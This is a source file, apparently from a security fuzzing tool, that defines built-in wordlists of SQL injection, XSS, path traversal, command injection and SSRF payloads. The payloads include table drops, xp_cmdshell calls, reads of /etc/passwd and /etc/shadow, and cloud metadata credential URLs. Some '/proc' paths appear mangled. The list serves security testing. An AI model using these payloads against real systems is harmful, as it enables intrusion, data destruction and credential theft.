// fuzz/wordlist.mn — Built-in security payload wordlists
//
// Provides pre-built wordlists for common vulnerability classes:
// SQL injection, XSS, path traversal, command injection, and SSRF.
// Also supports loading custom wordlists from files.
//
// All payloads are curated from OWASP, SecLists, and real-world pentesting.
// No external dependencies beyond C runtime file I/O.

// ---------------------------------------------------------------------------
// Extern C runtime functions
// ---------------------------------------------------------------------------

extern "C" fn __mn_file_read(path: String) -> String

// ---------------------------------------------------------------------------
// Error type
// ---------------------------------------------------------------------------

+tipo WordlistError:
    | FileNotFound(String)
    | EmptyFile(String)
    | ParseError(String)

fn new_file_not_found(msg: String) -> WordlistError:
    da FileNotFound(msg)

fn new_empty_file(msg: String) -> WordlistError:
    da EmptyFile(msg)

fn new_parse_error(msg: String) -> WordlistError:
    da ParseError(msg)

// ---------------------------------------------------------------------------
// String helpers
// ---------------------------------------------------------------------------

fn trim_line(s: String) -> String:
    pon slen: Int = len(s)
    si slen == 0 { da s }

    // Find first non-whitespace
    pon mut start: Int = 0
    mien start < slen:
        pon ch: String = s.char_at(start)
        si ch != " ":
            si ch != "\t":
                si ch != "\r":
                    si ch != "\n":
                        sal
        start = start + 1

    // Find last non-whitespace
    pon mut end: Int = slen - 1
    mien end >= start:
        pon ch: String = s.char_at(end)
        si ch != " ":
            si ch != "\t":
                si ch != "\r":
                    si ch != "\n":
                        sal
        end = end - 1

    si start > end:
        da ""

    da s.substr(start, end + 1)

fn split_lines(content: String) -> List<String>:
    pon slen: Int = len(content)
    pon mut lines: List<String> = []
    pon mut current: String = ""
    pon mut i: Int = 0

    mien i < slen:
        pon ch: String = content.char_at(i)
        si ch == "\n":
            lines = lines + [current]
            current = ""
        sino si ch == "\r":
            // Skip \r, the \n will trigger the line break
            si i + 1 < slen:
                si content.char_at(i + 1) == "\n":
                    // \r\n pair — skip the \r, \n handled next iteration
                    i = i + 1
                    sigue
            // Standalone \r
            lines = lines + [current]
            current = ""
        sino:
            current = current + ch
        i = i + 1

    // Don't forget the last line if no trailing newline
    si len(current) > 0:
        lines = lines + [current]

    da lines

// ---------------------------------------------------------------------------
// load_wordlist — read file, split by newlines, trim each line
// ---------------------------------------------------------------------------

+fn load_wordlist(path: String) -> Result<List<String>, String>:
    pon content: String = __mn_file_read(path)
    si len(content) == 0:
        da Err("Failed to read wordlist file: " + path)

    pon raw_lines: List<String> = split_lines(content)
    pon mut results: List<String> = []
    pon line_count: Int = len(raw_lines)
    pon mut i: Int = 0

    mien i < line_count:
        pon trimmed: String = trim_line(raw_lines[i])
        // Skip empty lines and comments (lines starting with #)
        si len(trimmed) > 0:
            pon first_ch: String = trimmed.char_at(0)
            si first_ch != "#":
                results = results + [trimmed]
        i = i + 1

    si len(results) == 0:
        da Err("Wordlist file is empty or contains only comments: " + path)

    da Ok(results)

// ---------------------------------------------------------------------------
// builtin_sqli — SQL injection payloads
// ---------------------------------------------------------------------------

+fn builtin_sqli() -> List<String>:
    pon mut payloads: List<String> = []

    // Classic OR-based
    payloads = payloads + ["' OR 1=1--"]
    payloads = payloads + ["\" OR \"\"=\""]
    payloads = payloads + ["' OR 'a'='a"]
    payloads = payloads + ["' OR '1'='1'--"]
    payloads = payloads + ["1 OR 1=1"]
    payloads = payloads + ["1' OR '1'='1"]

    // UNION-based
    payloads = payloads + ["' UNION SELECT NULL--"]
    payloads = payloads + ["' UNION SELECT NULL, NULL--"]
    payloads = payloads + ["' UNION SELECT NULL, NULL, NULL--"]
    payloads = payloads + ["' UNION ALL SELECT 1,2,3--"]

    // DROP/destructive
    payloads = payloads + ["1; DROP TABLE users--"]
    payloads = payloads + ["1; DROP TABLE users; --"]
    payloads = payloads + ["'; DROP TABLE users--"]

    // Authentication bypass
    payloads = payloads + ["admin'--"]
    payloads = payloads + ["admin' #"]
    payloads = payloads + ["admin'/*"]
    payloads = payloads + ["' OR 1=1#"]

    // Stacked queries / command execution
    payloads = payloads + ["'; EXEC xp_cmdshell('dir')--"]
    payloads = payloads + ["'; WAITFOR DELAY '0:0:5'--"]

    // ORDER BY probing
    payloads = payloads + ["1' ORDER BY 1--"]
    payloads = payloads + ["1' ORDER BY 10--"]
    payloads = payloads + ["1' ORDER BY 100--"]

    // Error-based
    payloads = payloads + ["' AND 1=CONVERT(int, @@version)--"]
    payloads = payloads + ["' AND extractvalue(1, concat(0x7e, version()))--"]

    // Blind SQL injection
    payloads = payloads + ["' AND 1=1--"]
    payloads = payloads + ["' AND 1=2--"]
    payloads = payloads + ["' AND SLEEP(5)--"]
    payloads = payloads + ["1 AND (SELECT COUNT(*) FROM users) > 0"]

    da payloads

// ---------------------------------------------------------------------------
// builtin_xss — Cross-site scripting payloads
// ---------------------------------------------------------------------------

+fn builtin_xss() -> List<String>:
    pon mut payloads: List<String> = []

    // Basic script tags
    payloads = payloads + ["<script>alert(1)</script>"]
    payloads = payloads + ["<script>alert('XSS')</script>"]
    payloads = payloads + ["<script>alert(document.cookie)</script>"]

    // Event handler injection
    payloads = payloads + ["<img src=x onerror=alert(1)>"]
    payloads = payloads + ["<svg onload=alert(1)>"]
    payloads = payloads + ["<body onload=alert(1)>"]
    payloads = payloads + ["<div onmouseover=alert(1)>hover</div>"]
    payloads = payloads + ["<input onfocus=alert(1) autofocus>"]
    payloads = payloads + ["<marquee onstart=alert(1)>"]
    payloads = payloads + ["<details open ontoggle=alert(1)>"]

    // JavaScript protocol
    payloads = payloads + ["javascript:alert(1)"]
    payloads = payloads + ["javascript:alert(document.domain)"]

    // Attribute breakout
    payloads = payloads + ["\"><script>alert(1)</script>"]
    payloads = payloads + ["'><script>alert(1)</script>"]
    payloads = payloads + ["\" onmouseover=\"alert(1)"]
    payloads = payloads + ["' onmouseover='alert(1)"]

    // Iframe injection
    payloads = payloads + ["<iframe src=\"javascript:alert(1)\">"]
    payloads = payloads + ["<iframe src=data:text/html,<script>alert(1)</script>>"]

    // Encoded variants
    payloads = payloads + ["<script>alert(String.fromCharCode(88,83,83))</script>"]
    payloads = payloads + ["<img src=x onerror=eval(atob('YWxlcnQoMSk='))>"]

    // SVG-based
    payloads = payloads + ["<svg><script>alert(1)</script></svg>"]
    payloads = payloads + ["<svg/onload=alert(1)>"]

    // Template injection (common in SPAs)
    payloads = payloads + ["{{constructor.constructor('alert(1)')()}}"]
    payloads = payloads + ["${alert(1)}"]

    da payloads

// ---------------------------------------------------------------------------
// builtin_traversal — Path traversal payloads
// ---------------------------------------------------------------------------

+fn builtin_traversal() -> List<String>:
    pon mut payloads: List<String> = []

    // Basic traversal
    payloads = payloads + ["../../etc/passwd"]
    payloads = payloads + ["../../../etc/passwd"]
    payloads = payloads + ["../../../../etc/passwd"]
    payloads = payloads + ["../../../../../etc/passwd"]

    // URL-encoded variants
    payloads = payloads + ["..%2f..%2fetc%2fpasswd"]
    payloads = payloads + ["..%252f..%252fetc%252fpasswd"]
    payloads = payloads + ["%2e%2e%2f%2e%2e%2fetc%2fpasswd"]
    payloads = payloads + ["%2e%2e/%2e%2e/etc/passwd"]

    // Backslash variants (Windows)
    payloads = payloads + ["..\\..\\etc\\passwd"]
    payloads = payloads + ["..\\..\\..\\etc\\passwd"]
    payloads = payloads + ["..\\..\\windows\\system32\\config\\sam"]

    // Double-dot bypass
    payloads = payloads + ["....//....//etc/passwd"]
    payloads = payloads + ["..../..../etc/passwd"]
    payloads = payloads + ["....\\....\\etc\\passwd"]

    // Absolute path
    payloads = payloads + ["/etc/passwd"]
    payloads = payloads + ["/etc/shadow"]
    payloads = payloads + ["/proc/yo/environ"]
    payloads = payloads + ["/proc/yo/cmdline"]

    // Null byte truncation (legacy)
    payloads = payloads + ["../../etc/passwd\0.jpg"]
    payloads = payloads + ["../../etc/passwd%00.jpg"]

    da payloads

// ---------------------------------------------------------------------------
// builtin_command_injection — Command injection payloads
// ---------------------------------------------------------------------------

+fn builtin_command_injection() -> List<String>:
    pon mut payloads: List<String> = []

    // Semicolon chaining
    payloads = payloads + ["; ls"]
    payloads = payloads + ["; ls -la"]
    payloads = payloads + ["; cat /etc/passwd"]
    payloads = payloads + ["; id"]
    payloads = payloads + ["; whoami"]

    // Pipe chaining
    payloads = payloads + ["| cat /etc/passwd"]
    payloads = payloads + ["| id"]
    payloads = payloads + ["| ls -la"]

    // Backtick execution
    payloads = payloads + ["`id`"]
    payloads = payloads + ["`whoami`"]
    payloads = payloads + ["`cat /etc/passwd`"]

    // $() subshell
    payloads = payloads + ["$(whoami)"]
    payloads = payloads + ["$(id)"]
    payloads = payloads + ["$(cat /etc/passwd)"]

    // Time-based detection
    payloads = payloads + ["; ping -c 1 127.0.0.1"]
    payloads = payloads + ["| sleep 5"]
    payloads = payloads + ["; sleep 5"]
    payloads = payloads + ["& ping -n 5 127.0.0.1"]

    // Windows-specific
    payloads = payloads + ["& dir"]
    payloads = payloads + ["& type C:\\Windows\\System32\\drivers\\etc\\hosts"]
    payloads = payloads + ["| type C:\\Windows\\win.ini"]

    // Encoded newlines
    payloads = payloads + ["%0als"]
    payloads = payloads + ["%0aid"]
    payloads = payloads + ["\nid\n"]
    payloads = payloads + ["\n/usr/bin/id\n"]

    // AND/OR chaining
    payloads = payloads + ["&& id"]
    payloads = payloads + ["|| id"]
    payloads = payloads + ["& id"]

    da payloads

// ---------------------------------------------------------------------------
// builtin_ssrf — Server-side request forgery payloads
// ---------------------------------------------------------------------------

+fn builtin_ssrf() -> List<String>:
    pon mut payloads: List<String> = []

    // Localhost variants
    payloads = payloads + ["http://127.0.0.1"]
    payloads = payloads + ["http://localhost"]
    payloads = payloads + ["http://0.0.0.0"]
    payloads = payloads + ["http://[::1]"]
    payloads = payloads + ["http://127.0.0.1:80"]
    payloads = payloads + ["http://127.0.0.1:443"]
    payloads = payloads + ["http://127.0.0.1:8080"]
    payloads = payloads + ["http://127.0.0.1:8443"]

    // AWS metadata endpoint
    payloads = payloads + ["http://169.254.169.254/latest/meta-data/"]
    payloads = payloads + ["http://169.254.169.254/latest/meta-data/iam/security-credentials/"]
    payloads = payloads + ["http://169.254.169.254/latest/user-data"]

    // GCP metadata
    payloads = payloads + ["http://metadata.google.internal/computeMetadata/v1/"]

    // Azure metadata
    payloads = payloads + ["http://169.254.169.254/metadata/instance?api-version=2021-02-01"]

    // Alternative IP representations
    payloads = payloads + ["http://0x7f000001"]
    payloads = payloads + ["http://2130706433"]
    payloads = payloads + ["http://017700000001"]
    payloads = payloads + ["http://0177.0.0.1"]
    payloads = payloads + ["http://127.1"]

    // DNS rebinding / internal network
    payloads = payloads + ["http://10.0.0.1"]
    payloads = payloads + ["http://192.168.1.1"]
    payloads = payloads + ["http://172.16.0.1"]

    // Protocol handlers
    payloads = payloads + ["file:///etc/passwd"]
    payloads = payloads + ["file:///proc/yo/environ"]
    payloads = payloads + ["gopher://127.0.0.1:25/"]
    payloads = payloads + ["dict://127.0.0.1:11211/"]

    da payloads

// ---------------------------------------------------------------------------
// all_builtins — combine all built-in wordlists
// ---------------------------------------------------------------------------

+fn all_builtins() -> List<String>:
    pon mut results: List<String> = []

    pon sqli: List<String> = builtin_sqli()
    pon mut i: Int = 0
    mien i < len(sqli):
        results = results + [sqli[i]]
        i = i + 1

    pon xss: List<String> = builtin_xss()
    i = 0
    mien i < len(xss):
        results = results + [xss[i]]
        i = i + 1

    pon traversal: List<String> = builtin_traversal()
    i = 0
    mien i < len(traversal):
        results = results + [traversal[i]]
        i = i + 1

    pon cmdi: List<String> = builtin_command_injection()
    i = 0
    mien i < len(cmdi):
        results = results + [cmdi[i]]
        i = i + 1

    pon ssrf: List<String> = builtin_ssrf()
    i = 0
    mien i < len(ssrf):
        results = results + [ssrf[i]]
        i = i + 1

    da results
